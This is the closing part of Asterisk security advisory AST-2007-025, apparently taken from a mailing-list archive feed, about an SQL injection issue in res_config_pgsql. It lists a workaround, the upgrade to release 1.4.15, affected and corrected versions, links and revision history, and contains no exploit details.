&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | configured for use by the administrator. Default &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | installations of Asterisk are not affected. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Workaround | Convert your installation to use res_config_odbc with the |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| PgsqlODBC driver. This module provides similar &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| functionality but is not vulnerable. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Resolution &amp;nbsp; &amp;nbsp;| Upgrade to Asterisk release 1.4.15 or higher. &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Affected Versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Release &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; Series &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.2.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.4.x &amp;nbsp; &amp;nbsp;| 1.4.14 and previous &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;A.x.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;B.x.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Business Edition &amp;nbsp;| &amp;nbsp; &amp;nbsp;C.x.x &amp;nbsp; &amp;nbsp;| C.1.0-beta5 and previous &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;AsteriskNOW &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | pre-release | None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Asterisk Appliance &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;0.x.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; Developer Kit &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| s800i (Asterisk Appliance) | &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| None &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Corrected In &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Open Source &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.4.15 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Business Edition &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C.1.0-beta6 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|-------------------------------------------+----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Links &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Asterisk Project Security Advisories are posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://www.asterisk.org/security&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.asterisk.org/security&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| This document may be superseded by later versions; if so, the latest &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| version will be posted at &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-025.pdf&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-025.pdf&lt;/a&gt;&amp;nbsp;and &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &lt;a href=&quot;http://downloads.digium.com/pub/security/AST-2007-025.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://downloads.digium.com/pub/security/AST-2007-025.html&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Revision History &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Date &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp;Editor &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Revisions Made &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------+-------------------+-------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| 2007-11-29 &amp;nbsp; | Tilghman Lesher &amp;nbsp; | Initial release &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------+-------------------+-------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| 2007-11-29 &amp;nbsp; | Tilghman Lesher &amp;nbsp; | Added CVE number, ABE C version &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-025
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Copyright (c) 2007 Digium, Inc. All Rights Reserved.
&lt;br&gt;&amp;nbsp; Permission is hereby granted to distribute and publish this advisory in its
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;original, unaltered form.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/AST-2007-025---SQL-Injection-issue-in-res_config_pgsql-tp14139556p14139556.html" />
</entry>

</feed>
